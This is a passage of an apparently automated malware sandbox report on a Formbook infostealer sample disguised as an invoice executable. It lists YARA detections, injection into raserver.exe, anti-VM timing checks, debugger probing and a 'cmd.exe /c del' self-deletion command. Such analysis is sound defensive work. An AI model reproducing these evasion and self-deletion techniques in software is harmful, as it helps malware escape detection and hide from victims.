          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D8E824
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CDA830
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CD99BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CBF900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CD4120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D74AEF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D822AE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D6FA2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D7DBD2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D703DA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEABD8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D623E3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CEEBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CDAB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04CDA309
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D82B28
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00ACD042
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00ACCB69
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AB8C60
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AB8C5B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AB2D87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AB2D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AB2FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00ACCF4E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04CBB150 appears 133 times
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: String function: 00AEB150 appears 136 times
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000000.00000003.647610440.0000000009C3F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Proforma Invoice and Bank swift-REG.PI-0086547654.exe
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704494044.0000000000959000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs Proforma Invoice and Bank swift-REG.PI-0086547654.exe
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704631628.0000000000BDF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Proforma Invoice and Bank swift-REG.PI-0086547654.exe
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.24d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@11/8
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_01
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Temp\nsv24C7.tmpJump to behavior
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exeVirustotal: Detection: 29%
          Source: Proforma Invoice and Bank swift-REG.PI-0086547654.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile read: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.695638149.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000000.00000003.650872254.0000000009990000.00000004.00000001.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704631628.0000000000BDF000.00000040.00000001.sdmp, raserver.exe, 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704478667.0000000000940000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 00000002.00000002.704478667.0000000000940000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.695638149.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeUnpacked PE file: 2.2.Proforma Invoice and Bank swift-REG.PI-0086547654.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_6F732F60 push eax; ret
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00416026 push ebx; iretd
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_0041C087 push dword ptr [DF0C81F8h]; ret
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00409A94 push 00D6BDC6h; iretd
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B3D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_04D0D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00ACC087 push dword ptr [DF0C81F8h]; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AC6026 push ebx; iretd
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00AB9A94 push 00D6BDC6h; iretd
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00ACB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00ACB40B push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00ACB402 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00ACB46C push eax; ret
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile created: C:\Users\user\AppData\Local\Temp\nsp24F7.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000AB85E4 second address: 0000000000AB85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000AB897E second address: 0000000000AB8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeAPI coverage: 6.5 %
          Source: C:\Windows\SysWOW64\raserver.exeAPI coverage: 7.1 %
          Source: C:\Windows\explorer.exe TID: 5752Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 7124Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.695476860.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.673631126.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.670610896.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.673631126.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.692663618.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.695476860.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.673760254.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.695476860.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.673812206.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000005.00000000.695476860.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B1F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B63884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00AE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B0B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B7B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B7B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 2_2_00B7B8D0 mov eax, dword ptr fs:[00000030h]
